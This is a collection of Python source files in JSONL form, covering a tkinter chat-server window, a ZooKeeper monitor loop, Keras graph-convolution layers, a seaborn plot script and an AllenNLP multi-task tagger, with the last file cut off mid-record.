{"seq_id":"293664698","text":"from tkinter import *\nfrom lib.server import Server\nfrom socket import *\nfrom lib.threads import MyServerThread\n\n\nclass ServerWindow: # -> GUI object: the server window\n    def __init__(self):\n        self.__root = Tk() # -> root window\n        self.__frame = Frame(self.__root) # -> frame for the widgets\n        self.__label = Label(self.__frame) # -> displays the server IP\n        self.__chat = Label(self.__frame) # -> used to display messages\n\n        self.__host = [(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close())\n                       for s in [socket(AF_INET, SOCK_DGRAM)]][0][1] # -> obtain the local IP\n\n        self.__port = 9001 # port number\n        self.__server = Server(self.__host, self.__port) # -> create a Server instance\n
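        # Editor's note (not in the original): the socket trick above opens a UDP\n        # connection to 8.8.8.8 purely to discover the outward-facing local IP;\n        # no packets are actually sent.\n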
        self.__server_thread = MyServerThread(self.__server, self.__chat) # -> create the worker thread\n\n    def config(self): # -> window and widget settings\n        self.__root.title('Server module')\n        self.__root.geometry('500x700+700+50')\n        self.__root.config(bg='PaleTurquoise')\n        self.__root.resizable(True, False)\n\n        self.__label.config(text=str(self.__host), font='Arial 12 bold', fg='SteelBlue')\n        self.__chat.config(text=str(self.__host), font='Arial 10', fg='navy', justify=LEFT, width=100, wraplength=400)\n\n    def layout(self): # -> widget placement\n        self.__frame.pack(pady=15, padx=15)\n        self.__label.pack(padx=15)\n        self.__chat.pack(pady=15, padx=15)\n\n    def open(self): # -> starts this window object\n        self.config()\n        self.layout()\n        self.__server_thread.daemon = True # -> mark the thread as a daemon\n\n        self.__server_thread.start()\n        self.__root.mainloop()\n","sub_path":"gui/server_window.py","file_name":"server_window.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"253818717","text":"import os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom common.traincbox import *\n\nimport time\nimport threading\n\n\ndef mymonitorabox(number, workerabox):\n    logger.info('create an A%d box monitor.' % number)\n    workerabox.addtraintaskMonitor()\n\nif __name__ == '__main__':\n    workerAbox = []\n    logger.info('start monitor a box for training tasks.')\n\n    for i in range(CBOX['Am']):\n        workerAbox.append(TrainCBox('A', i+ 1))\n        # workerAbox[i].connectZK()\n        # workerAbox[i].startZK()\n\n    while True:\n        for i in range(CBOX['Am']):\n            workerAbox[i].connectZK()\n            workerAbox[i].startZK()\n\n        for i in range(CBOX['Am']):\n            # pass the callable and its args separately; the original called\n            # mymonitorabox(...) immediately instead of handing it to the thread\n            t = threading.Thread(target=mymonitorabox, args=(i, workerAbox[i]))\n            t.start()\n            t.join()\n\n        for i in range(CBOX['Am']):\n            workerAbox[i].stopZK()\n\n        time.sleep(20)\n\n    # for i in range(CBOX['Am']):\n    #     workerAbox[i].stopZK()\n","sub_path":"trainbox/monitorabox.py","file_name":"monitorabox.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"145375801","text":"import sys\nimport inspect\n\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras import backend as K\n\nfrom nw2vec import codecs\n\n\nclass GC(keras.layers.Layer):\n\n    def __init__(self,\n                 units,\n                 activation=None,\n                 use_bias=True,\n                 gather_mask=False,\n                 kernel_initializer='glorot_uniform',\n                 bias_initializer='zeros',\n                 kernel_regularizer=None,\n                 bias_regularizer=None,\n                 activity_regularizer=None,\n                 kernel_constraint=None,\n                 bias_constraint=None,\n                 **kwargs):\n        super(GC, self).__init__(**kwargs)\n        self.units = units\n        self.activation = keras.activations.get(activation)\n        self.use_bias = use_bias\n        self.gather_mask = gather_mask\n        self.kernel_initializer = keras.initializers.get(kernel_initializer)\n        self.bias_initializer = keras.initializers.get(bias_initializer)\n        self.kernel_regularizer = keras.regularizers.get(kernel_regularizer)\n        self.bias_regularizer = keras.regularizers.get(bias_regularizer)\n        self.activity_regularizer = keras.regularizers.get(activity_regularizer)\n        self.kernel_constraint = keras.constraints.get(kernel_constraint)\n        self.bias_constraint = keras.constraints.get(bias_constraint)\n        self.input_spec = [keras.engine.InputSpec(ndim=2),\n                           keras.engine.InputSpec(ndim=1),\n                           keras.engine.InputSpec(ndim=2)]\n        self.supports_masking = False\n\n    def build(self, 
input_shapes):\n adj_shape, mask_shape, features_shape = input_shapes\n\n assert len(adj_shape) == 2\n assert len(mask_shape) == 1\n assert len(features_shape) == 2\n\n n_nodes = adj_shape[0]\n features_dim = features_shape[1]\n\n self.kernel = self.add_weight(shape=(features_dim, self.units),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n self.bias = self.add_weight(shape=(self.units,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n self.input_spec = [keras.engine.InputSpec(ndim=2, axes={0: n_nodes, 1: n_nodes}),\n keras.engine.InputSpec(ndim=1, axes={0: n_nodes}),\n keras.engine.InputSpec(ndim=2, axes={0: n_nodes, 1: features_dim})]\n super(GC, self).build(input_shapes)\n\n def call(self, inputs):\n adj, mask, features = inputs\n\n A_tilde = tf.sparse_add(adj, tf.eye(tf.shape(adj)[0], dtype=K.floatx()))\n D_tilde_out_inv_sqrt = tf.matrix_diag(1.0 / K.sqrt(K.sum(A_tilde, axis=0)))\n D_tilde_in_inv_sqrt = tf.matrix_diag(1.0 / K.sqrt(K.sum(A_tilde, axis=1)))\n A_hat = D_tilde_out_inv_sqrt @ A_tilde @ D_tilde_in_inv_sqrt\n\n output = tf.matmul(A_hat, features @ self.kernel, a_is_sparse=True)\n if self.use_bias:\n output = K.bias_add(output, self.bias)\n if self.activation is not None:\n output = self.activation(output)\n if self.gather_mask:\n output = tf.boolean_mask(output, mask)\n else:\n output = output * K.expand_dims(mask, -1)\n return output\n\n def compute_output_shape(self, input_shapes):\n adj_shape, mask_shape, features_shape = input_shapes\n assert len(adj_shape) == 2\n assert len(mask_shape) == 1\n assert len(features_shape) == 2\n\n return (None, self.units)\n\n def get_config(self):\n config = {\n 'units': self.units,\n 'activation': keras.activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'gather_mask': self.gather_mask,\n 'kernel_initializer': keras.initializers.serialize(self.kernel_initializer),\n 'bias_initializer': keras.initializers.serialize(self.bias_initializer),\n 'kernel_regularizer': keras.regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': keras.regularizers.serialize(self.bias_regularizer),\n 'activity_regularizer': keras.regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': keras.constraints.serialize(self.kernel_constraint),\n 'bias_constraint': keras.constraints.serialize(self.bias_constraint)\n }\n base_config = super(GC, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\nclass Bilinear(keras.layers.Layer):\n\n def __init__(self,\n bilin_axis,\n fixed_kernel=None,\n fixed_bias=None,\n activation=None,\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None,\n call_impl='whileloop', # set to \"tensordot\" to revert to the old implementation\n **kwargs):\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n\n # Validate 
arguments\n if fixed_bias is not None:\n assert use_bias\n\n super(Bilinear, self).__init__(**kwargs)\n self.bilin_axis = bilin_axis\n self.fixed_kernel = fixed_kernel\n self.fixed_bias = fixed_bias\n self.activation = keras.activations.get(activation)\n self.use_bias = use_bias\n self.kernel_initializer = keras.initializers.get(kernel_initializer)\n self.bias_initializer = keras.initializers.get(bias_initializer)\n self.kernel_regularizer = keras.regularizers.get(kernel_regularizer)\n self.bias_regularizer = keras.regularizers.get(bias_regularizer)\n self.activity_regularizer = keras.regularizers.get(activity_regularizer)\n self.kernel_constraint = keras.constraints.get(kernel_constraint)\n self.bias_constraint = keras.constraints.get(bias_constraint)\n assert call_impl in ['whileloop', 'tensordot']\n self.call_impl = call_impl\n self.input_spec = [keras.engine.InputSpec(min_ndim=2, max_ndim=3)] * 2\n self.supports_masking = False\n\n def _process_input_shapes(self, input_shapes):\n if not isinstance(input_shapes, list) or len(input_shapes) != 2:\n raise ValueError('A `Bilinear` layer should be called '\n 'on a list of 2 inputs.')\n # The two tensors must have the same shape\n assert input_shapes[0] == input_shapes[1]\n shape = input_shapes[0]\n assert len(shape) in [2, 3]\n\n # Check the reduction axis is not the bilinear axis\n bilin_axis = self.bilin_axis % len(shape)\n if len(shape) == 3:\n assert bilin_axis in [0, 1]\n else:\n assert bilin_axis == 0\n\n # Get the diag_axis if it exists\n if len(shape) == 3:\n diag_axis = 1 - bilin_axis\n else:\n diag_axis = None\n\n return bilin_axis, diag_axis, shape[-1]\n\n def build(self, input_shapes):\n bilin_axis, _, input_dim = self._process_input_shapes(input_shapes)\n\n if self.fixed_kernel is not None:\n self.kernel = K.constant(self.fixed_kernel)\n else:\n self.kernel = self.add_weight(shape=(input_dim, input_dim),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer,\n constraint=self.kernel_constraint)\n if self.use_bias:\n if self.fixed_bias is not None:\n self.bias = K.constant(self.fixed_bias)\n else:\n self.bias = self.add_weight(shape=(),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n\n self.input_spec = [keras.layers.InputSpec(min_ndim=2, max_ndim=3,\n axes={-1: input_dim})] * 2\n super(Bilinear, self).build(input_shapes)\n\n def call(self, inputs):\n if self.call_impl == 'whileloop':\n return self.call_whileloop(inputs)\n else:\n return self.call_tensordot(inputs)\n\n def call_whileloop(self, inputs):\n tensor0, tensor1 = inputs\n bilin_axis, diag_axis, _ = self._process_input_shapes([tensor0.shape, tensor1.shape])\n assert bilin_axis in [0, 1]\n assert (diag_axis is None) or (diag_axis == 1 - bilin_axis)\n bilin_dim, diag_dim = tensor0.shape[bilin_axis], tensor0.shape[diag_axis]\n if isinstance(bilin_dim, tf.Dimension):\n bilin_dim = bilin_dim.value\n if isinstance(diag_dim, tf.Dimension):\n diag_dim = diag_dim.value\n\n K_tensor1 = tf.tensordot(tensor1, self.kernel, axes=[[-1], [1]])\n if diag_axis is None:\n assert len(tensor0.shape) == len(tensor1.shape) == 2\n output = tf.tensordot(tensor0, K_tensor1, axes=[[-1], [-1]])\n else:\n\n def diag_slice(k):\n idx = [0.0, 0.0, slice(None)]\n idx[diag_axis] = k\n idx[bilin_axis] = slice(None)\n return idx\n\n def counter(i, t):\n return i < diag_dim\n\n def body(i, t):\n idx = diag_slice(i)\n slice_dot = tf.tensordot(tensor0[idx], 
K_tensor1[idx], axes=[[-1], [-1]])\n return (i + 1, tf.concat([t, K.expand_dims(slice_dot, 0)], axis=0))\n\n i0 = K.constant(0, dtype=tf.int32)\n if bilin_dim is None:\n bilin_dim_dyn = tf.shape(tensor0)[bilin_axis]\n out0 = K.zeros((0, bilin_dim_dyn, bilin_dim_dyn))\n else:\n out0 = K.zeros((0, bilin_dim, bilin_dim))\n\n _, output = tf.while_loop(\n counter, body, loop_vars=[i0, out0],\n shape_invariants=[i0.get_shape(), tf.TensorShape([None, bilin_dim, bilin_dim])]\n )\n\n if self.use_bias:\n output = output + self.bias\n if self.activation is not None:\n output = self.activation(output)\n output = K.expand_dims(output, 0)\n return output\n\n def call_tensordot(self, inputs):\n tensor0, tensor1 = inputs\n bilin_axis, diag_axis, _ = self._process_input_shapes([tensor0.shape, tensor1.shape])\n\n Q_tensor1 = tf.tensordot(tensor1, self.kernel, axes=[[-1], [1]])\n output = tf.tensordot(tensor0, Q_tensor1, axes=[[-1], [-1]])\n if diag_axis is not None:\n # Dynamically check that both tensors have the same dimension in diag_axis\n with tf.control_dependencies(\n [tf.assert_equal(tf.shape(tensor0)[diag_axis], tf.shape(tensor1)[diag_axis])]):\n # Put the bilinear axes first and the diagonal axes last\n output = tf.transpose(output,\n perm=[bilin_axis, 2 + bilin_axis, diag_axis, 2 + diag_axis])\n # Take the diagonal elements for the diagonal axes\n output = tf.matrix_diag_part(output)\n # Put the reduced diagonal axis first, the bilinear axes last\n output = tf.transpose(output, perm=[2, 0, 1])\n\n if self.use_bias:\n output = output + self.bias\n if self.activation is not None:\n output = self.activation(output)\n output = K.expand_dims(output, 0)\n return output\n\n def compute_output_shape(self, input_shapes):\n bilin_axis, diag_axis, _ = self._process_input_shapes(input_shapes)\n axes = ([] if len(input_shapes[0]) == 2 else [(0, diag_axis)]\n + [(0, bilin_axis), (1, bilin_axis)])\n return ((1,) + tuple([input_shapes[tensor][ax] if ax is not None else None\n for tensor, ax in axes]))\n\n def get_config(self):\n config = {\n 'bilin_axis': self.bilin_axis,\n 'fixed_kernel': self.fixed_kernel,\n 'fixed_bias': self.fixed_bias,\n 'activation': keras.activations.serialize(self.activation),\n 'use_bias': self.use_bias,\n 'kernel_initializer': keras.initializers.serialize(self.kernel_initializer),\n 'bias_initializer': keras.initializers.serialize(self.bias_initializer),\n 'kernel_regularizer': keras.regularizers.serialize(self.kernel_regularizer),\n 'bias_regularizer': keras.regularizers.serialize(self.bias_regularizer),\n 'activity_regularizer': keras.regularizers.serialize(self.activity_regularizer),\n 'kernel_constraint': keras.constraints.serialize(self.kernel_constraint),\n 'bias_constraint': keras.constraints.serialize(self.bias_constraint)\n }\n base_config = super(Bilinear, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\nclass ParametrisedStochastic(keras.layers.Lambda):\n\n def __init__(self, codec_name, n_samples, **kwargs):\n self.codec_name = codec_name\n self.n_samples = n_samples\n\n def sampler(params):\n return codecs.get(codec_name, params).stochastic_value(n_samples)\n\n super(ParametrisedStochastic, self).__init__(sampler, 
**kwargs)\n\n def compute_output_shape(self, input_shape):\n codec_output_shape = codecs.available_codecs()[self.codec_name]\\\n .compute_output_shape(input_shape)\n return codec_output_shape[:-1] + (self.n_samples,) + codec_output_shape[-1:]\n\n def get_config(self):\n config = {\n 'codec_name': self.codec_name,\n 'n_samples': self.n_samples\n }\n # Skip the Lambda-specific config parameters as we recreate the Lambda layer ourselves\n base_config = super(keras.layers.Lambda, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n @classmethod\n def from_config(cls, config, custom_objects=None):\n # Recover any numpy array arguments\n config = config.copy()\n for key in config:\n if isinstance(config[key], dict):\n if 'type' in config[key] and config[key]['type'] == 'ndarray':\n config[key] = np.array(config[key]['value'])\n\n return cls(**config)\n\n\ndef available_layers():\n return dict(\n inspect.getmembers(sys.modules[__name__],\n lambda m: inspect.isclass(m) and issubclass(m, keras.layers.Layer))\n )\n","sub_path":"nw2vec/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":16224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"418807654","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series,DataFrame\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nanscombe=sns.load_dataset(\"anscombe\",engine=\"python\")\nprint(anscombe)\n\nsns.set(style=\"ticks\", color_codes=True)\n\ngrid = sns.lmplot(x=\"x\",y=\"y\",data=anscombe,hue=\"dataset\",col=\"dataset\",col_wrap=2)\n\ngrid.axes[0].set_ylabel(\"y\", size=20)\ngrid.axes[2].set_ylabel(\"y\", size=20)\ngrid.axes[2].set_xlabel(\"x\", size=20)\ngrid.axes[3].set_xlabel(\"x\", size=20)\ngrid.set_titles(\"{col_name}\", size=20)\n\ngrid.axes[0].tick_params(labelsize=20)\ngrid.axes[2].tick_params(labelsize=20)\ngrid.axes[3].tick_params(labelsize=20)\n\nplt.show()","sub_path":"datasOf2019/anscomb.py","file_name":"anscomb.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192822914","text":"from typing import Dict, Optional\n\nfrom IPython import embed\nimport numpy\nfrom overrides import overrides\nimport torch\nfrom torch.nn.modules.linear import Linear\nimport torch.nn.functional as F\nfrom collections import OrderedDict\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import check_dimensions_match\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder, ConditionalRandomField\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits\nfrom allennlp.training.metrics import CategoricalAccuracy, SpanBasedF1Measure\n\n\n@Model.register(\"multi_tagger\")\nclass MultiTagger(Model):\n \"\"\"\n This ``MultiTagger`` encodes a sequence of text with a stacked ``Seq2SeqEncoder``, then\n predicts multiple tags for each token in the sequence.\n\n Parameters\n ----------\n vocab : ``Vocabulary``, required\n A Vocabulary, required in order to compute sizes for input/output projections.\n tasks : ``str``, required\n A list of task names\n domains : ``str``, required\n A list of domain names\n text_field_embedder : ``TextFieldEmbedder``, required\n Used to embed the ``tokens`` ``TextField`` we get as input to the model.\n 
stacked_encoder : ``Seq2SeqEncoder``\n The encoder (with its own internal stacking) that we will use in between embedding tokens\n and predicting output tags.\n source_namespace : ``str``, optional (default=``tokens``)\n namespace for vocab of source sentences\n label_suffix_namespace : ``str``, optional (default=``labels``)\n task_name + '_' + label_suffix_namespace is the namespace for vocab of tags for each task\n is_crf : bool, optional (default=``False``)\n Use conditional random field loss instead of the standard softmax\n initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``)\n Used to initialize the model parameters.\n regularizer : ``RegularizerApplicator``, optional (default=``None``)\n If provided, will be used to calculate the regularization penalty during training.\n \"\"\"\n\n def __init__(self, vocab: Vocabulary,\n tasks: str,\n domains: str,\n text_field_embedder: TextFieldEmbedder,\n stacked_encoder: Seq2SeqEncoder,\n source_namespace: str = \"tokens\",\n label_suffix_namespace: str = \"labels\",\n is_crf: bool = False,\n initializer: InitializerApplicator = InitializerApplicator(),\n regularizer: Optional[RegularizerApplicator] = None) -> None:\n super(MultiTagger, self).__init__(vocab, regularizer)\n self.tasks = tasks\n self.domains = domains\n # Create task-to-ID and domain-to-ID mappings\n self.task_to_id = {}\n for i, tsk in enumerate(tasks):\n self.task_to_id[tsk] = i\n self.domain_to_id = {}\n for i, dmn in enumerate(domains):\n self.domain_to_id[dmn] = i\n self.source_namespace = source_namespace\n self.label_suffix_namespace = label_suffix_namespace\n self.text_field_embedder = text_field_embedder\n self.stacked_encoder = stacked_encoder\n self.label_namespaces = OrderedDict()\n self.tag_projection_layer = OrderedDict()\n self.num_classes = OrderedDict()\n self.is_crf = is_crf\n self.crf = OrderedDict()\n self.metrics = OrderedDict()\n self.span_metric = OrderedDict()\n for tsk in self.tasks:\n task_label_namespace = tsk + '_' + label_suffix_namespace\n self.label_namespaces[tsk] = task_label_namespace\n self.num_classes[tsk] = self.vocab.get_vocab_size(task_label_namespace)\n self.tag_projection_layer[tsk] = TimeDistributed(Linear(self.stacked_encoder.get_output_dim(),\n self.num_classes[tsk]))\n if is_crf:\n self.crf[tsk] = ConditionalRandomField(self.num_classes[tsk])\n self.metrics[tsk] = {\n \"accuracy\": CategoricalAccuracy(),\n \"accuracy3\": CategoricalAccuracy(top_k=3)\n }\n self.span_metric[tsk] = SpanBasedF1Measure(vocab, tag_namespace=task_label_namespace)\n self.tag_projection_layer = torch.nn.Sequential(self.tag_projection_layer)\n if is_crf:\n self.crf = torch.nn.Sequential(self.crf)\n check_dimensions_match(text_field_embedder.get_output_dim(), stacked_encoder.get_input_dim(),\n \"text field embedding dim\", \"encoder input dim\")\n initializer(self)\n\n def _examine_source_indices(self, preindices):\n if not isinstance(preindices, numpy.ndarray):\n preindices = preindices.data.cpu().numpy()\n all_predicted_tokens = []\n for indices in preindices:\n predicted_tokens = [self.vocab.get_token_from_index(\n x, namespace=self.source_namespace) for x in list(indices)]\n all_predicted_tokens.append(predicted_tokens)\n return all_predicted_tokens\n\n def _examine_target_indices(self, tsk, preindices):\n if not isinstance(preindices, numpy.ndarray):\n preindices = preindices.data.cpu().numpy()\n all_predicted_tokens = []\n for indices in preindices:\n indices = list(indices)\n # Collect indices till the first end_symbol\n # 
if self._end_index in indices:\n # indices = indices[:indices.index(self._end_index)]\n predicted_tokens = [self.vocab.get_token_from_index(\n x, namespace=self.label_namespaces[tsk]) for x in indices]\n all_predicted_tokens.append(predicted_tokens)\n return all_predicted_tokens\n\n def _print_source_target_triplets(self, tsk, src, tgt, true_tgt):\n src = self._examine_source_indices(src)\n true_tgt = self._examine_target_indices(tsk, true_tgt)\n tgt = self._examine_target_indices(tsk, tgt)\n for i in [0, int(len(src)/2), -1]:\n print('Source: ', ' '.join(src[i]))\n print('Target: ', ' '.join(tgt[i]))\n print('True target: ', ' '.join(true_tgt[i]))\n print('')\n\n def task_forward(self,\n tsk_id,\n tsk,\n tokens: Dict[str, torch.LongTensor],\n tags: torch.LongTensor = None) -> Dict[str, torch.Tensor]:\n embedded_text_input = self.text_field_embedder(tokens)\n mask = get_text_field_mask(tokens)\n encoded_text = self.stacked_encoder(embedded_text_input, mask)\n logits = self.tag_projection_layer[tsk_id].forward(encoded_text) # (batch_size, sequence_length, num_classes)\n if self.is_crf:\n predicted_tags = self.crf[tsk_id].viterbi_tags(logits, mask)\n else:\n reshaped_log_probs = logits.view(-1, self.num_classes[tsk])\n batch_size, sequence_length, _ = embedded_text_input.size()\n class_probabilities = F.softmax(reshaped_log_probs, dim=-1).view(\n [batch_size, sequence_length, self.num_classes[tsk]])\n all_predictions = class_probabilities.cpu().data.numpy()\n if all_predictions.ndim == 3:\n predictions_list = [all_predictions[i] for i in range(all_predictions.shape[0])]\n else:\n predictions_list = [all_predictions]\n predicted_tags = []\n for predictions in predictions_list:\n argmax_indices = numpy.argmax(predictions, axis=-1)\n predicted_tags.append(argmax_indices)\n output_dict = {\"logits\": logits,\n \"tags\": predicted_tags,\n \"mask\": mask}\n if tags is not None:\n loss = 0.0\n if self.is_crf:\n log_likelihood = self.crf[tsk_id](logits, tags, mask)\n loss = -log_likelihood\n else:\n loss = sequence_cross_entropy_with_logits(logits, tags, mask)\n for metric in self.metrics[tsk].values():\n metric(logits, tags, mask.float())\n output_dict[\"loss\"] = loss\n\n # Represent viterbi tags as \"class probabilities\" that we can\n # feed into the `span_metric`\n class_probabilities = logits * 0.\n for i, instance_tags in enumerate(predicted_tags):\n for j, tag_id in enumerate(instance_tags):\n class_probabilities[i, j, tag_id] = 1\n self.span_metric[tsk](class_probabilities, tags, mask)\n self._print_source_target_triplets(tsk, tokens['tokens'], numpy.array(predicted_tags), tags)\n return output_dict\n\n @overrides\n def forward(self, # type: ignore\n task_token: torch.LongTensor,\n domain_token: torch.LongTensor,\n tokens: Dict[str, torch.LongTensor],\n all_tags: torch.LongTensor) -> Dict[str, torch.Tensor]:\n # pylint: disable=arguments-differ\n \"\"\"\n Parameters\n ----------\n tokens : Dict[str, torch.LongTensor], required\n The output of ``TextField.as_array()``, which should typically be passed directly to a\n ``TextFieldEmbedder``. This output is a dictionary mapping keys to ``TokenIndexer``\n tensors. At its most basic, using a ``SingleIdTokenIndexer`` this is: ``{\"tokens\":\n Tensor(batch_size, num_tokens)}``. This dictionary will have the same keys as were used\n for the ``TokenIndexers`` when you created the ``TextField`` representing your\n sequence. 
The dictionary is designed to be passed directly to a ``TextFieldEmbedder``,\n which knows how to combine different word representations into a single vector per\n token in your input.\n *_tags : torch.LongTensor, optional (default = None)\n A torch tensor representing the sequence of integer gold class labels of shape\n ``(batch_size, num_tokens)``.\n\n Returns\n -------\n An output dictionary consisting of:\n logits : torch.FloatTensor\n A tensor of shape ``(batch_size, num_tokens, tag_vocab_size)`` representing\n unnormalised log probabilities of the tag classes.\n class_probabilities : torch.FloatTensor\n A tensor of shape ``(batch_size, num_tokens, tag_vocab_size)`` representing\n a distribution of the tag classes per word.\n loss : torch.FloatTensor, optional\n A scalar loss to be optimised.\n\n \"\"\"\n # num_tasks = all_tags.size(1)\n batch_size = task_token.shape[0]\n predictions = [[]] * batch_size\n label_namespaces = [''] * batch_size\n loss = 0.0\n task_ids = []\n for tt in task_token.squeeze().data.cpu().numpy():\n # map task token to strings\n # map strings to ind\n task_ids.append(self.task_to_id[self.vocab.get_token_from_index(tt, 'task_labels')])\n task_ids = numpy.array(task_ids)\n # batch_one = False\n\n for i, tsk in enumerate(self.tasks):\n # For each element in tokens (tokens, token_characters, etc.),\n # select only the relevant data in the minibatch\n task_indices = (task_ids == i).nonzero()[0]\n print(i, task_indices)\n if task_indices.shape[0] < 1:\n continue\n # elif task_indices.shape[0] == 1:\n # task_indices = numpy.concatenate((task_indices, task_indices), axis=0)\n task_tokens = {}\n for k in tokens:\n if task_indices.shape[0] > 1:\n task_tokens[k] = tokens[k][task_indices, :].squeeze()\n else:\n task_tokens[k] = tokens[k][task_indices, :]\n task_all_tags = all_tags[:, i, :].squeeze(dim=1)\n if task_indices.shape[0] > 1:\n task_all_tags = task_all_tags[task_indices, :].squeeze().contiguous()\n else:\n task_all_tags = task_all_tags[task_indices, :].contiguous()\n # embed()\n task_output_dict = self.task_forward(i, tsk, task_tokens, task_all_tags)\n task_tags = task_output_dict['tags']\n for j, ti in enumerate(task_indices):\n predictions[ti] = task_tags[j]\n label_namespaces[ti] = tsk\n loss += task_output_dict['loss']\n # if task_indices.shape[0] == 1:\n # batch_one = True\n # if batch_one:\n # embed()\n output_dict = {'loss': loss,\n 'tags': predictions,\n 'label_namespaces': label_namespaces}\n return output_dict\n\n def task_decode(self, tsk, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n output_dict[\"tags\"] = [\n [self.vocab.get_token_from_index(tag, namespace=self.label_namespaces[tsk])\n for tag in instance_tags]\n for instance_tags in output_dict[\"tags\"]]\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Converts the tag ids to the actual tags.\n ``output_dict[\"tags\"]`` is a list of lists of tag_ids,\n so we use an ugly nested list comprehension.\n \"\"\"\n task_output_dicts = {}\n for tsk in self.tasks:\n tmp_output_dict = output_dict.copy()\n task_output_dicts[tsk + '_labels'] = self.task_decode(tsk, tmp_output_dict)\n all_predicted_tokens = []\n for b, task_namespace in enumerate(output_dict['label_namespaces']):\n all_predicted_tokens.append(task_output_dicts[task_namespace]['tags'][b])\n output_dict['tags'] = all_predicted_tokens\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n # 
task_accs = {}\n task_f1s = {}\n for tsk in self.tasks:\n # for metric_name, metric in self.metrics[tsk].items():\n # task_accs[tsk + '-' + metric_name] = metric.get_metric(reset)\n metric_dict = self.span_metric[tsk].get_metric(reset=reset)\n for x, y in metric_dict.items():\n # if \"overall\" in x:\n if \"f1-measure-overall\" in x:\n task_f1s[tsk + '-' + x] = y\n # avg_accs = {}\n avg_f1s = {}\n # for metric_name, _ in self.metrics[self.tasks[0]].items():\n # total_acc = []\n # for tsk in self.tasks:\n # total_acc.append(task_accs[tsk + '-' + metric_name])\n # avg_accs[metric_name] = sum(total_acc) / len(total_acc)\n for x, _ in self.span_metric[self.tasks[0]].get_metric(reset=reset).items():\n # if \"overall\" in x:\n if \"f1-measure-overall\" in x:\n total_f1 = []\n for tsk in self.tasks:\n total_f1.append(task_f1s[tsk + '-' + x])\n avg_f1s[x] = sum(total_f1) / len(total_f1)\n # return {**avg_f1s, ** avg_accs, **task_f1s, **task_accs, }\n return {**avg_f1s, **task_f1s}\n\n @classmethod\n def from_params(cls, vocab: Vocabulary, params: Params) -> 'MultiTagger':\n tasks = params.pop(\"tasks\")\n domains = params.pop(\"domains\")\n embedder_params = params.pop(\"text_field_embedder\")\n text_field_embedder = TextFieldEmbedder.from_params(vocab, embedder_params)\n stacked_encoder = Seq2SeqEncoder.from_params(params.pop(\"stacked_encoder\"))\n source_namespace = params.pop(\"source_namespace\", \"tokens\")\n label_suffix_namespace = params.pop(\"label_suffix_namespace\", \"labels\")\n is_crf = params.pop(\"is_crf\", False)\n # device = params.pop(\"device\", -1)\n initializer = InitializerApplicator.from_params(params.pop('initializer', []))\n regularizer = RegularizerApplicator.from_params(params.pop('regularizer', []))\n return cls(vocab=vocab,\n tasks=tasks,\n domains=domains,\n text_field_embedder=text_field_embedder,\n stacked_encoder=stacked_encoder,\n source_namespace=source_namespace,\n label_suffix_namespace=label_suffix_namespace,\n is_crf=is_crf,\n initializer=initializer,\n regularizer=regularizer)\n","sub_path":"allennlp/models/multi_tagger.py","file_name":"multi_tagger.py","file_ext":"py","file_size_in_byte":16667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"24677817","text":"import sys\nimport copy\nimport random\nimport itertools\nimport argparse\n\nbacktrack_call_num = 0\nbacktrack_fail_num = 0\n\nclass CSP:\n def __init__(self):\n # self.variables is a list of the variable names in the CSP\n self.variables = []\n\n # self.domains[i] is a list of legal values for variable i\n self.domains = {}\n\n # self.constraints[i][j] is 